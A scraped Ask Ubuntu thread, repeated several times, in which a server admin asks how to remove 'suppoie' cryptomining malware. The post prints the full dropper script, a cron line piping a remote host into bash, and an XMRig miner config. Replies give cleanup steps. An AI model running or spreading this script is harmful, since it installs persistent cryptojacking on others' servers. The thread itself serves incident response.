suppoie malware removal (script hidden in .jpg)

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP








up vote
3
down vote

favorite












Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?



curl -s http://158.69.133.18:8220/logo7.jpg


#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && 
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && 
crontab /tmp/cron || true && 
rm -rf /tmp/cron || true && 
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."



16.04 malware




share|improve this question


















  • 3




    You should restore from a system backup. serverfault.com/q/218005
    – dsstorefile1
    Apr 19 at 23:24










  • Its done and system seems clean. I think its related to Drupas security issues.
    – R Netz
    Apr 19 at 23:55






  • 3




    The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
    – Thomas Ward♦
    Apr 24 at 19:20














up vote
3
down vote

favorite












Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?



curl -s http://158.69.133.18:8220/logo7.jpg


#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && 
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && 
crontab /tmp/cron || true && 
rm -rf /tmp/cron || true && 
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."



16.04 malware




share|improve this question


















  • 3




    You should restore from a system backup. serverfault.com/q/218005
    – dsstorefile1
    Apr 19 at 23:24










  • Its done and system seems clean. I think its related to Drupas security issues.
    – R Netz
    Apr 19 at 23:55






  • 3




    The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
    – Thomas Ward♦
    Apr 24 at 19:20












up vote
3
down vote

favorite









up vote
3
down vote

favorite











Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?



curl -s http://158.69.133.18:8220/logo7.jpg


#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && 
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && 
crontab /tmp/cron || true && 
rm -rf /tmp/cron || true && 
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."



16.04 malware




share|improve this question














Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?



curl -s http://158.69.133.18:8220/logo7.jpg


#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && 
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && 
crontab /tmp/cron || true && 
rm -rf /tmp/cron || true && 
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."




16.04 malware





share|improve this question













share|improve this question




share|improve this question








edited May 3 at 5:54









Melebius

3,75841636




3,75841636










asked Apr 19 at 23:17









R Netz

164




164







  • 3




    You should restore from a system backup. serverfault.com/q/218005
    – dsstorefile1
    Apr 19 at 23:24










  • Its done and system seems clean. I think its related to Drupas security issues.
    – R Netz
    Apr 19 at 23:55






  • 3




    The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
    – Thomas Ward♦
    Apr 24 at 19:20












  • 3




    You should restore from a system backup. serverfault.com/q/218005
    – dsstorefile1
    Apr 19 at 23:24










  • Its done and system seems clean. I think its related to Drupas security issues.
    – R Netz
    Apr 19 at 23:55






  • 3




    The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
    – Thomas Ward♦
    Apr 24 at 19:20







3




3




You should restore from a system backup. serverfault.com/q/218005
– dsstorefile1
Apr 19 at 23:24




You should restore from a system backup. serverfault.com/q/218005
– dsstorefile1
Apr 19 at 23:24












Its done and system seems clean. I think its related to Drupas security issues.
– R Netz
Apr 19 at 23:55




Its done and system seems clean. I think its related to Drupas security issues.
– R Netz
Apr 19 at 23:55




3




3




The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
– Thomas Ward♦
Apr 24 at 19:20




The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
– Thomas Ward♦
Apr 24 at 19:20










2 Answers
2






active

oldest

votes

















up vote
2
down vote













It is in your www-data cron:



 sudo crontab -e -u www-data


You'll see something like:



 * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


Kill the process then clear it out of /var/tmp






share|improve this answer



























    up vote
    2
    down vote













    I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.



    In my case, it is in /var/spool/cron/crontabs/, also curl something like



     * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


    and the script is in /var/tmp/config.json and suppoie,
    which looks like this



    {
    "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
    "av": 0, // algorithm variation, 0 auto select
    "background": true, // true to run the miner in the background
    "colors": true, // false to disable colored output 
    "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1, // donate level, mininum 1%
    "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. 
    "print-time": 60, // print hashrate report every N seconds
    "retries": 5, // number of times to retry before switch to backup server
    "retry-pause": 5, // time to pause between retries
    "safe": false, // true to safe adjust threads and av settings for current CPU
    "threads": null, // number of miner threads
    "pools": [
     
     "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
     "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
     "pass": "x", // password for mining server
     "keepalive": true, // send keepalived for prevent timeout (need pool support)
     "nicehash": false // enable nicehash/xmrig-proxy support
     
    ],
    "api": 
     "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null, // access token for API
     "worker-id": null // custom worker-id for API



    Deleted the line in crontabs, and cleared /var/tmp/, seems worked






    share|improve this answer




















      Your Answer







      StackExchange.ready(function()
      var channelOptions =
      tags: "".split(" "),
      id: "89"
      ;
      initTagRenderer("".split(" "), "".split(" "), channelOptions);

      StackExchange.using("externalEditor", function()
      // Have to fire editor after snippets, if snippets enabled
      if (StackExchange.settings.snippets.snippetsEnabled)
      StackExchange.using("snippets", function()
      createEditor();
      );

      else
      createEditor();

      );

      function createEditor()
      StackExchange.prepareEditor(
      heartbeatType: 'answer',
      convertImagesToLinks: true,
      noModals: false,
      showLowRepImageUploadWarning: true,
      reputationToPostImages: 10,
      bindNavPrevention: true,
      postfix: "",
      onDemand: true,
      discardSelector: ".discard-answer"
      ,immediatelyShowMarkdownHelp:true
      );



      );













       

      draft saved


      draft discarded


















      StackExchange.ready(
      function ()
      StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1026545%2fsuppoie-malware-removal-script-hidden-in-jpg%23new-answer', 'question_page');

      );

      Post as a guest

















      2 Answers
      2






      active

      oldest

      votes








      2 Answers
      2






      active

      oldest

      votes









      active

      oldest

      votes






      active

      oldest

      votes








      up vote
      2
      down vote













      It is in your www-data cron:



       sudo crontab -e -u www-data


      You'll see something like:



       * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


      Kill the process then clear it out of /var/tmp






      share|improve this answer
























        up vote
        2
        down vote













        It is in your www-data cron:



         sudo crontab -e -u www-data


        You'll see something like:



         * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


        Kill the process then clear it out of /var/tmp






        share|improve this answer






















          up vote
          2
          down vote










          up vote
          2
          down vote









          It is in your www-data cron:



           sudo crontab -e -u www-data


          You'll see something like:



           * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


          Kill the process then clear it out of /var/tmp






          share|improve this answer












          It is in your www-data cron:



           sudo crontab -e -u www-data


          You'll see something like:



           * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


          Kill the process then clear it out of /var/tmp







          share|improve this answer












          share|improve this answer



          share|improve this answer










          answered Apr 24 at 19:18









          automan

          211




          211






















              up vote
              2
              down vote













              I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.



              In my case, it is in /var/spool/cron/crontabs/, also curl something like



               * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


              and the script is in /var/tmp/config.json and suppoie,
              which looks like this



              {
              "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
              "av": 0, // algorithm variation, 0 auto select
              "background": true, // true to run the miner in the background
              "colors": true, // false to disable colored output 
              "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
              "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
              "donate-level": 1, // donate level, mininum 1%
              "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
              "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. 
              "print-time": 60, // print hashrate report every N seconds
              "retries": 5, // number of times to retry before switch to backup server
              "retry-pause": 5, // time to pause between retries
              "safe": false, // true to safe adjust threads and av settings for current CPU
              "threads": null, // number of miner threads
              "pools": [
               
               "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
               "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
               "pass": "x", // password for mining server
               "keepalive": true, // send keepalived for prevent timeout (need pool support)
               "nicehash": false // enable nicehash/xmrig-proxy support
               
              ],
              "api": 
               "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
               "access-token": null, // access token for API
               "worker-id": null // custom worker-id for API



              Deleted the line in crontabs, and cleared /var/tmp/, seems worked






              share|improve this answer
























                up vote
                2
                down vote













                I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.



                In my case, it is in /var/spool/cron/crontabs/, also curl something like



                 * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


                and the script is in /var/tmp/config.json and suppoie,
                which looks like this



                {
                "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
                "av": 0, // algorithm variation, 0 auto select
                "background": true, // true to run the miner in the background
                "colors": true, // false to disable colored output 
                "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
                "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
                "donate-level": 1, // donate level, mininum 1%
                "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
                "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. 
                "print-time": 60, // print hashrate report every N seconds
                "retries": 5, // number of times to retry before switch to backup server
                "retry-pause": 5, // time to pause between retries
                "safe": false, // true to safe adjust threads and av settings for current CPU
                "threads": null, // number of miner threads
                "pools": [
                 
                 "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
                 "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
                 "pass": "x", // password for mining server
                 "keepalive": true, // send keepalived for prevent timeout (need pool support)
                 "nicehash": false // enable nicehash/xmrig-proxy support
                 
                ],
                "api": 
                 "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
                 "access-token": null, // access token for API
                 "worker-id": null // custom worker-id for API



                Deleted the line in crontabs, and cleared /var/tmp/, seems worked






                share|improve this answer






















                  up vote
                  2
                  down vote










                  up vote
                  2
                  down vote









                  I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.



                  In my case, it is in /var/spool/cron/crontabs/, also curl something like



                   * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


                  and the script is in /var/tmp/config.json and suppoie,
                  which looks like this



                  {
                  "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
                  "av": 0, // algorithm variation, 0 auto select
                  "background": true, // true to run the miner in the background
                  "colors": true, // false to disable colored output 
                  "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
                  "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
                  "donate-level": 1, // donate level, mininum 1%
                  "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
                  "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. 
                  "print-time": 60, // print hashrate report every N seconds
                  "retries": 5, // number of times to retry before switch to backup server
                  "retry-pause": 5, // time to pause between retries
                  "safe": false, // true to safe adjust threads and av settings for current CPU
                  "threads": null, // number of miner threads
                  "pools": [
                   
                   "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
                   "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
                   "pass": "x", // password for mining server
                   "keepalive": true, // send keepalived for prevent timeout (need pool support)
                   "nicehash": false // enable nicehash/xmrig-proxy support
                   
                  ],
                  "api": 
                   "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
                   "access-token": null, // access token for API
                   "worker-id": null // custom worker-id for API



                  Deleted the line in crontabs, and cleared /var/tmp/, seems worked






                  share|improve this answer












                  I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.



                  In my case, it is in /var/spool/cron/crontabs/, also curl something like



                   * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s


                  and the script is in /var/tmp/config.json and suppoie,
                  which looks like this



                  {
                  "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
                  "av": 0, // algorithm variation, 0 auto select
                  "background": true, // true to run the miner in the background
                  "colors": true, // false to disable colored output 
                  "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
                  "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
                  "donate-level": 1, // donate level, mininum 1%
                  "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
                  "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. 
                  "print-time": 60, // print hashrate report every N seconds
                  "retries": 5, // number of times to retry before switch to backup server
                  "retry-pause": 5, // time to pause between retries
                  "safe": false, // true to safe adjust threads and av settings for current CPU
                  "threads": null, // number of miner threads
                  "pools": [
                   
                   "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
                   "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
                   "pass": "x", // password for mining server
                   "keepalive": true, // send keepalived for prevent timeout (need pool support)
                   "nicehash": false // enable nicehash/xmrig-proxy support
                   
                  ],
                  "api": 
                   "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
                   "access-token": null, // access token for API
                   "worker-id": null // custom worker-id for API



                  Deleted the line in crontabs, and cleared /var/tmp/, seems worked







                  share|improve this answer












                  share|improve this answer



                  share|improve this answer










                  answered Apr 26 at 17:14









                  Henry Zhang

                  211




                  211



























                       

                      draft saved


                      draft discarded















































                       


                      draft saved


                      draft discarded














                      StackExchange.ready(
                      function ()
                      StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1026545%2fsuppoie-malware-removal-script-hidden-in-jpg%23new-answer', 'question_page');

                      );

                      Post as a guest
































































                      -

                      Popular posts from this blog

                      GRUB: Fatal! inconsistent data read from (0x84) 0+xxxxxx

                      Image
                      Clash Royale CLAN TAG #URR8PPP up vote 1 down vote favorite Can anybody help me with this messages at (before) grub starts booting? . . Fatal! inconsistent data read from (0x84) 0+xxxxxx . Fatal! inconsistent data read from (0x84) n+yyyyyy . (hd0,4) This is running in dual boot with windows 7. Both Windows and Ubuntu are running flawlessly, except for this "errors" list. boot grub2 share | improve this question edited Apr 8 at 12:59 Byte Commander 59.4k 26 159 267 asked Apr 8 at 12:56 Viciente 6 1 add a comment  |  up vote 1 down vote favorite Can anybody help me with this messages at (before) grub starts booting? . . Fatal! inconsistent data read from (0x84) 0+xxxxxx . Fatal! inconsistent data read from (0x84) n+yyyyyy . (hd0,4) This is running in dual boot with windows 7. Both Windows and Ubuntu are running flawlessly, except for this "errors" list. boot grub2 share | improve th...
                      Read more

                      `kcmshell` modules relation with `/usr/share/applications`

                      Image
                      Clash Royale CLAN TAG #URR8PPP up vote 0 down vote favorite A Little Background I am using Plasma V 5.5.5 , Qt V 5.5.1 , Kernel 4.4.0-116 , in a 64Bits OS with Kubuntu 16.04. I like the Phonon GUI to test Right and Left speakers separately, so I said, let's add it to the Favorites panel in the KDE dash: a simple drag and drop would do it. I did it, obtaining the following as a response when clicking the icon in the Favorites Panel: There had to be a workaround, I decided to go to the plasma-org.kde.plasma.desktop-appletsrc file, located at /home/toquica/.config , where I would look for the favoritesApps line (the one starting with [Containments][131][Applets][149][Configuration][General] because I am using the Application Dashboard option for the dash) and I actually found the entry: kcm_phonon.desktop . A Problem to a Solution I then decided to go to /usr/share/applications and create the file kcm_phonon.desktop with some information like: [Desktop Entry] Versio...
                      Read more

                      How to enroll fingerprints to Ubuntu 17.10 with VFS491

                      Image
                      Clash Royale CLAN TAG #URR8PPP up vote 1 down vote favorite I decided to switch from Windows to Ubuntu 17.10, I meet it like 8 years ago and I didn't decided to switch until now (haha). Well, my actual device is an HP Probook 4540s with a Validity fingerprint sensor (VFS491). The fingerprint sensor worked fine on Windows but I can't get it to work in Ubuntu. The device is recognized as 138a:003d but is not detected as a fingerprint scanner by some apps like Fingerprint GUI. I want to use the fingerprint scanner to log in into my user account in Ubuntu but it doesn't supports fingerprints without special software and the drivers of the fingerprint scanner are available for Windows but not for any Linux distribution. I found something on GitHub (https://github.com/eekpie/libfprint) about the integration of the VFS491 in libfprint and I think it can help but I don't know what to do with it, so that's why I need the help of the community to do it since I am...
                      Read more